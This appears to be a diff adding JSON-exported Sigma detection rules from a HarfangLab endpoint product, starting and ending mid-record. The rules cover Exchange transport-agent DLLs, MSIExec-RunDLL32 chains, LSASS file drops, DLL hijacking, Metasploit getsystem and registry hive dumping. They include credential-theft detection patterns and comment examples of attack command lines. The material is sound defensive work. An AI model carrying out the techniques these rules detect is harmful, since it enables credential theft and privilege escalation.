"backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.617032Z", + "creation_date": "2026-03-23T11:45:34.617036Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.617043Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + 
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf", + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook", + "https://attack.mitre.org/techniques/T1505/002/" + ], + "name": "t1505_002_edgetransport_loading_unsigned_dll.yml", + "content": "title: Exchange EdgeTransport.exe Loaded Unsigned DLL\nid: 029b4b5e-5b84-4646-ae2b-9c19d795c627\ndescription: |\n Detects the loading of an unsigned DLL into EdgeTransport.exe.\n Attackers can install malicious TransportAgents in an compromised Exchange server. This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/22\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1071.003\n - attack.t1104\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.MemoryExecution\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 
'EdgeTransport.exe'\n ImageLoaded|contains: '?'\n\n filter_empty:\n ImageSize: 0\n\n filter_microsoft_pdb:\n ManagedPdbBuildPath|startswith:\n - '?:\\dbs\\sh\\e16dt\\'\n - '?:\\dbs\\sh\\gffn\\'\n\n exclusion_signed:\n Signed: 'true'\n\n exclusion_assembly:\n ImageLoaded|startswith: '?:\\Windows\\assembly\\'\n\n exclusion_msvcm:\n ImageLoaded: '?:\\Windows\\winsxs\\amd64_microsoft.vc*.crt_*\\msvcm*.dll'\n\n exclusion_trendmicro:\n ImageLoaded|startswith: '?:\\Program Files\\Trend Micro\\Smex\\'\n\n exclusion_newton_json:\n ManagedPdbBuildPath: '?:\\Development\\Releases\\Json\\Working\\Newtonsoft.Json\\Src\\Newtonsoft.Json\\obj\\Release\\Newtonsoft.Json.pdb'\n\n exclusion_skimsigner:\n ImageLoaded|startswith: '?:\\Program Files\\Exchange DkimSigner'\n\n exclusion_exclaimer:\n ImageLoaded|startswith: '?:\\Program Files\\Exclaimer Ltd\\Email Alias Manager\\'\n\n exclusion_xml_serializer:\n sha256: 'd934a6ed579619a0c0629606a0b774855703a5eec5661749e823d4456ed77e33'\n ImageLoaded|startswith: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\XmlSerializer.Exclaimer.LeanLicensing.License_'\n\n exclusion_passive_monitoring:\n sha256: '5eb73220279d1fa2525912a6e34061646990382b82dbd250297dbf6bbb8a9aaf'\n\n exclusion_mimekit:\n - ImageLoaded: '?:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\MimeKit.dll'\n - sha256: '69ae032bad923d3e9b7ad95b569222cdbe6ddcfb56cb302e7419869000b07dcd'\n\n exclusion_codetwo:\n ImageLoaded: '?:\\Program Files\\CodeTwo\\CodeTwo Exchange Rules\\\\*.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "029b4b5e-5b84-4646-ae2b-9c19d795c627", + "rule_name": "Exchange EdgeTransport.exe Loaded Unsigned DLL", + "rule_description": "Detects the loading of an unsigned DLL into EdgeTransport.exe.\nAttackers can install malicious TransportAgents in an compromised Exchange server. 
This malicious TransportAgent is in the form of a DLL loaded into EdgeTransport.exe.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to analyze the loaded DLL, as well as to look for other signs of intrusion on the affected server.\n", + "rule_creation_date": "2022-11-22", + "rule_modified_date": "2025-11-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection", + "attack.command_and_control", + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1071.003", + "attack.t1104", + "attack.t1114.002", + "attack.t1505.002", + "attack.t1546.008" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "029c4324-60c2-46df-b249-b6b72b737c5e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.616491Z", + "creation_date": "2026-03-23T11:45:34.616495Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.616503Z", + 
"rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://twitter.com/Cryptolaemus1/status/1733243361534857222", + "https://attack.mitre.org/techniques/T1218/011/" + ], + "name": "t1218_011_suspicious_rundll32_msiexec.yml", + "content": "title: Suspicious RunDLL32 Execution via MSIExec\nid: 029c4324-60c2-46df-b249-b6b72b737c5e\ndescription: |\n Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\n Attackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\n Specifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\n This behavior is used by the Pikabot malware, in its initial infection chain.\n It is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\nreferences:\n - https://twitter.com/Cryptolaemus1/status/1733243361534857222\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2023/12/11\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'RUNDLL32.EXE'\n CommandLine|contains: '?:\\Users\\\\*\\AppData\\Local\\Temp'\n ParentImage|endswith: '\\rundll32.exe'\n GrandparentImage|endswith: '\\msiexec.exe'\n\n exclusion_setupapi:\n CommandLine|contains: 'setupapi,InstallHinfSection'\n\n exclusion_adinstrument:\n CommandLine|contains: '\\ADInstruments\\LabChart8\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "029c4324-60c2-46df-b249-b6b72b737c5e", + "rule_name": "Suspicious RunDLL32 Execution via 
MSIExec", + "rule_description": "Detects the suspicious loading of a DLL by RunDLL32 via MSIExec.\nAttackers can use MSI files as an installation vector for malware, executing malicious payloads during the installation process.\nSpecifically, they can configure a Custom Action in the MSI to load a DLL via RunDLL32.\nThis behavior is used by the Pikabot malware, in its initial infection chain.\nIt is recommended to analyze the loaded DLL and to look for malicious content or actions performed by RunDLL32.\n", + "rule_creation_date": "2023-12-11", + "rule_modified_date": "2025-02-07", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1218.011" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.297348Z", + "creation_date": "2026-03-23T11:45:35.297352Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.297359Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + 
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/", + "https://github.com/gentilkiwi/mimikatz" + ], + "name": "t1003_001_lsass_dropping_file_unknown_module.yml", + "content": "title: File Dropped by LSASS Process from Unknown Module\nid: 02b0f6f4-476e-4b12-8067-6fbac9b0fc30\ndescription: |\n Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\n The LSASS process is responsible for authentications in Windows.\n Adversaries may attempt to access credential material stored in the LSASS' process memory.\n A file dropped by the LSASS process could be the result of credential theft.\n It is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\n If this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\nreferences:\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://github.com/gentilkiwi/mimikatz\ndate: 2025/03/24\nmodified: 2026/03/05\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\lsass.exe'\n MinimalStackTrace|endswith: '|UNKNOWN'\n\n exclusion_netlogon:\n Path: '?:\\Windows\\System32\\config\\netlogon.ftl'\n\n exclusion_path:\n Path:\n - '?:\\ProgramData\\Microsoft\\Crypto\\Keys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\\\????????????????????????????????_????????-????-????-????-????????????'\n - '?:\\System Volume Information\\EFS0.LOG'\n - '?:\\Windows\\NTDS\\edbtmp.log'\n - 
'?:\\Users\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n - '?:\\Users\\\\*\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\ServiceProfiles\\\\*\\AppData\\Roaming\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\\\*'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\\\????????-????-????-????-????????????'\n - '?:\\Windows\\System32\\Microsoft\\Protect\\S-*\\User\\\\????????-????-????-????-????????????'\n\n exclusion_credential_manager:\n Path:\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????????????????????????????????????.vcrd'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Vault\\\\????????-????-????-????-????????????\\\\????????-????-????-????-????????????.vsch'\n\n exclusion_securetimeaggregator:\n Path: '?:\\Windows\\System32\\\\????????-????-????-????-????????????'\n StackTrace|contains: '|?:\\Windows\\System32\\SecureTimeAggregator.dll!'\n\n exclusion_btpass:\n MinimalStackTrace|contains: '|BTPassAsm.dll|'\n Path: '?:\\Windows\\BTPass\\BT*.txt'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "02b0f6f4-476e-4b12-8067-6fbac9b0fc30", + "rule_name": "File Dropped by LSASS Process from Unknown Module", + "rule_description": "Detects when a file is written to disk by the Local Security Authority Subsystem Service (LSASS) process from an unknown module.\nThe LSASS process is responsible for authentications in Windows.\nAdversaries may attempt to access credential material stored in the LSASS' process memory.\nA file dropped by the LSASS process could be the 
result of credential theft.\nIt is recommended to investigate processes loaded before LSASS dropped this file as well as to download the dropped file for analysis.\nIf this activity is recurrent in your environment and you've determined its legitimacy, it is highly recommended to whitelist the concerned path.\n", + "rule_creation_date": "2025-03-24", + "rule_modified_date": "2026-03-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "02c15562-11e7-4250-b6e6-12f040b41450", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.591575Z", + "creation_date": "2026-03-23T11:45:34.591579Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.591587Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://securityintelligence.com/posts/windows-features-dll-sideloading/", + "https://github.com/xforcered/WFH", + "https://wietze.github.io/blog/save-the-environment-variables", + 
"https://attack.mitre.org/techniques/T1574/001/" + ], + "name": "t1574_001_dll_hijacking_iesettingsync.yml", + "content": "title: DLL Hijacking via IESettingSync.exe\nid: 02c15562-11e7-4250-b6e6-12f040b41450\ndescription: |\n Detects potential Windows DLL Hijacking via IESettingSync.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'IESettingSync.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cabinet.dll'\n - '\\iertutil.dll'\n - '\\mpr.dll'\n - '\\sspicli.dll'\n - '\\umpdc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: 
strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "02c15562-11e7-4250-b6e6-12f040b41450", + "rule_name": "DLL Hijacking via IESettingSync.exe", + "rule_description": "Detects potential Windows DLL Hijacking via IESettingSync.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", + "rule_creation_date": "2022-09-15", + "rule_modified_date": "2025-07-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1574.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.077208Z", + 
"creation_date": "2026-03-23T11:45:34.077210Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.077214Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://docs.rapid7.com/metasploit/meterpreter-getsystem/", + "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70", + "https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c", + "https://attack.mitre.org/techniques/T1134/001/" + ], + "name": "t1134_001_metasploit_get_system.yml", + "content": "title: Metasploit Get SYSTEM Command Detected\nid: 02ce0f33-c820-4f8d-8af4-6118aa5e0f86\ndescription: |\n Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\n Metasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\n Metasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\n It is recommended to investigate other malicious actions taken by the detected process and its ancestors.\nreferences:\n - https://docs.rapid7.com/metasploit/meterpreter-getsystem/\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2022/02/14\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1134.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Metasploit\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n 
selection_services:\n ParentImage|endswith: '\\services.exe'\n\n selection_variant_cmd:\n # cmd.exe /c echo lddocl > \\\\.\\pipe\\lddocl\n Image|endswith: '\\cmd.exe'\n CommandLine|endswith: '/c echo ?????? > \\\\\\\\.\\\\pipe\\\\??????'\n\n selection_variant_rundll32:\n # rundll32.exe C:\\Windows\\TEMP\\lddocl.dll,a /p:lddocl\n Image|endswith: '\\rundll32.exe'\n CommandLine|endswith: '??????.dll,a /p:??????'\n\n condition: selection_services and 1 of selection_variant_*\nlevel: critical\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86", + "rule_name": "Metasploit Get SYSTEM Command Detected", + "rule_description": "Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\nMetasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\nMetasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\nIt is recommended to investigate other malicious actions taken by the detected process and its ancestors.\n", + "rule_creation_date": "2022-02-14", + "rule_modified_date": "2025-01-28", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1134.001", + "attack.t1569.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + 
"whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.079579Z", + "creation_date": "2026-03-23T11:45:34.079581Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.079586Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1003/002/", + "https://attack.mitre.org/techniques/T1003/004/" + ], + "name": "t1003_registry_extract_shadowcopy.yml", + "content": "title: Sensitive Registry Hive Dumped from Volume Shadow Copy\nid: 02fc96b9-8da8-4b40-8a75-557d9c2f79d3\ndescription: |\n Detects file accesses to registry hives saved inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2023/06/26\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.002\n - attack.t1003.004\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n 
Path|endswith:\n - '\\Windows\\System32\\config\\SYSTEM'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\RegBack\\SYSTEM'\n - '\\Windows\\System32\\config\\RegBack\\SAM'\n - '\\Windows\\System32\\config\\RegBack\\SECURITY'\n # - '\\Windows\\System32\\config\\SOFTWARE' # too many FP\n\n selection_remote_system:\n # Impacket’s secretsdump used with the option —use-remoteSSMethod.\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr:\n - 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n - 'FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0160 FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpDlpService.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_trusted_installer:\n ProcessImage: 
'?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\Cobian Backup ??\\cbService.exe'\n - '\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_commvault:\n # For an unknwn reseaon the file has a valid signature but we say it is unsigned...\n ProcessImage|endswith:\n - '\\Commvault\\ContentStore\\Base\\cvd.exe'\n - '\\Commvault\\Base\\CLBackup.exe'\n - '\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_dell:\n ProcessDescription: 'Avamar Backup Client'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Dell Technologies Inc.'\n - 'EMC Corporation'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3", + "rule_name": "Sensitive Registry Hive Dumped from Volume Shadow Copy", + "rule_description": "Detects file accesses to registry hives saved inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be 
indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n", + "rule_creation_date": "2023-06-26", + "rule_modified_date": "2025-10-23", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003", + "attack.t1003.002", + "attack.t1003.004" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "032b28af-b4ce-4476-a201-8b2896158878", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 